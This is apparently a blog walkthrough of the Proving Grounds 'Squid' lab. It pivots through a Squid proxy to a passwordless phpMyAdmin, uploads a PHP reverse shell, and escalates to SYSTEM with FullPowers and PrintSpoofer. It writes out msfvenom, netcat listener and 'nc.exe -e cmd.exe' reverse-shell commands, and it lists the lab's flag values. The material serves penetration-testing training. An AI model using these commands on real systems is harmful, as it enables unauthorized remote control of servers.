Proving Grounds | Squid

Proving Grounds | Squid

24 days ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Thu Sep  1 17:05:22 2022 as: nmap -Pn -p- -A -T5 -oN scan.txt 192.168.57.189
Nmap scan report for 192.168.57.189
Host is up (0.079s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 3128/tcp)
HOP RTT      ADDRESS
1   79.55 ms 192.168.49.1
2   79.77 ms 192.168.57.189

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  1 17:17:17 2022 -- 1 IP address (1 host up) scanned in 716.09 seconds





Service Enumeration

TCP/3128

Try doing some banner grabbing:

This confirms the nmap fingerprint of Squid http proxy 4.14 . Let's check Exploit DB for any version-specific vulnerabilities.

searchsploit squid



Proxy Testing

HTTP Proxy Testing

Nothing for this particular version in Exploit DB. I checked Google for some exploits as well, but I'm not seeing any remote exploits available.

I stumbled across this cheat sheet in my Googling, however.

3128 - Pentesting Squid - HackTricks

The suggestion here is that we set the Squid proxy on Kali to act as a pivot point to internal services and/or ports.

Let's see what we can do.

curl --proxy http://192.168.57.189:3128 http://192.168.57.189



Testing Nmap Proxy

Looks like we got a Squid error on that request. Let's see if we can use it as a nmap proxy.

sudo nano /etc/proxychains4.conf

I've commented out my other proxy option and added the Squid proxy as a HTTP proxy.

Now, let's try a nmap scan. Since we're going through a proxy, we'll have to do a full SYN scan. I'm going to use the --top-ports option, since the full SYN scans can be quite slow.

proxychains -q nmap -Pn -sT -T4 --top-ports 1000 192.168.57.189
proxychains -q nmap -Pn -sT -T4 --top-ports 1000 localhost



Custom Proxy Port Scanning

All ports came back as ignored. We can also try the spose.py script here:

GitHub - aancw/spose: Squid Pivoting Open Port Scanner
Squid Pivoting Open Port Scanner. Contribute to aancw/spose development by creating an account on GitHub.
git clone https://github.com/aancw/spose
cd spose
python3 spose.py --proxy http://192.168.57.189:3128 --target 192.168.57.189



Testing the Proxied Services

Setting the Proxy

I am using this proxy switcher in my browser. From here, I can set the Squid proxy and navigate to the pages.

Proxy Switcher and Manager
Manage and switch between multiple proxy types (SOCKS, PAC, and Direct) with profile support



TCP/8080

The phpMyAdmin service looks interesting, let's take a look and see if there's a guessable password on that service.

Turns out, the service is configured to allow passwordless login for the root user.





Exploit

Details

Squid, acting as a reverse proxy, allows unauthenticated access to an internal Wamp server and PhpMyAdmin interface. The PhpMyAdmin interface is configured with passwordless login for the root user, allowing an attacker to create files in the web root, which can lead to code execution.



PhpMyAdmin to File Upload

Uploading Shell via PHPmyadmin
Uploading Shell via PHPmyadmin. GitHub Gist: instantly share code, notes, and snippets.

In the PhpMyAdmin interface, you can click on the SQL tab and run the suggested payload to create a uploader.php file in the web root.

From here, you can create a PHP reverse shell payload and upload it via this web form. That will upload your reverse shell file to the web root.



Reverse Shell

Create a reverse shell payload and upload it using the web form.

msfvenom -p php/reverse_php LHOST=192.168.49.57 LPORT=443 -f raw -o shell.php

Start a listener.

sudo rlwrap nc -lnvp 443

And, open http://192.168.57.189:8080/shell.php in your browser or using curl .



Upgrade Your Shell

Copy nc.exe to your current directory and serve it using smbserver.py.

cp /usr/share/windows-resources/binaries/nc.exe .
smbserver.py -smb2support -username evil -password evil evil $PWD

Start a listener on another port.

sudo rlwrap nc -lnvp 80

Now, from your reverse shell, execute nc.exe by using the UNC path.

net use z: \\192.168.49.57\evil /user:evil evil
Z:\nc.exe 192.168.49.57 80 -e cmd.exe





Post-Exploit Enumeration

Current User

Click to expand
USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

ERROR: Unable to get user claims information.



OS & Kernel

Click to expand
Host Name:                 SQUID
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-70000-00000-AA872
Original Install Date:     5/28/2021, 2:52:51 AM
System Boot Time:          7/13/2022, 9:49:25 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 862 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,122 MB
Virtual Memory: In Use:    1,309 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 11 Hotfix(s) Installed.
                           [01]: KB5007295
                           [02]: KB4512577
                           [03]: KB4535680
                           [04]: KB4577586
                           [05]: KB4589208
                           [06]: KB5003243
                           [07]: KB5003711
                           [08]: KB5005112
                           [09]: KB5007206
                           [10]: KB5006754
                           [11]: KB5005701
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.57.189
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.



Users

Click to expand
User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
WDAGUtilityAccount       



Groups

Click to expand
Aliases for \\SQUID

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
The command completed successfully.



Network

Interfaces
Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.57.189
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.57.254


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3128           0.0.0.0:0              LISTENING       4824
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1860
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1720
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       60
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1048
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1620
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       640
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       656
  TCP    192.168.57.189:139     0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       876
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3128              [::]:0                 LISTENING       4824
  TCP    [::]:3306              [::]:0                 LISTENING       1860
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:8080              [::]:0                 LISTENING       1720
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       520
  TCP    [::]:49665             [::]:0                 LISTENING       60
  TCP    [::]:49666             [::]:0                 LISTENING       1048
  TCP    [::]:49667             [::]:0                 LISTENING       1620
  TCP    [::]:49668             [::]:0                 LISTENING       640
  TCP    [::]:49672             [::]:0                 LISTENING       656


Ping Sweep
N/A



Processes

Click to expand
No interesting processes.



Services

Click to expand
No interesting services, unquoted service paths.



Scheduled Tasks

Click to expand
N/A





Privilege Escalation

After a lengthy amount of enumeration, I could not find any privileged services that could lead to a local privilege escalation. So, I turned to Google and I came across this very informative blog post.

Give Me Back My Privileges! Please?
I want to tell you the story of a service account which lost all its powers (a.k.a. privileges). Windows world is getting increasingly ruthless and when the system considers you are not worthy, this is what happens. Fortunately for our service account, all is not lost, there’s still hope. In this me…

The author has developed a local exploit that will streamline the process of regaining all of the privileges that service accounts used to come with.

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account
Recover the default privilege set of a LOCAL/NETWORK SERVICE account - GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account

After running the exploit, our service account now has SeImpersonatePrivilege enabled.

From here, I Googled for SeImpersonatePrivilege to SYSTEM.

Microsoft Windows - ‘SeImpersonatePrivilege’ Local Privilege Escalation
Applicable to: Plesk for Windows SituationWindows local Privilege Escalation with SeImpersonatePrivilege.There is a possibility of local privileges escalation up to SYSTEM privilege on Windows ...

Again, itm4n with the good stuff.

GitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019
Abusing Impersonation Privileges on Windows 10 and Server 2019 - GitHub - itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019

I host the PrintSpoofer64.exe on smbserver.py from before and execute.





Flags

C:\local.txt
6e071bbf55ee86b2c1691a3a8ae47c29


C:\Users\Administrator\Desktop\proof.txt
657c9d2fb8898397fbffbffba1a42e7a

Spread the word

Keep reading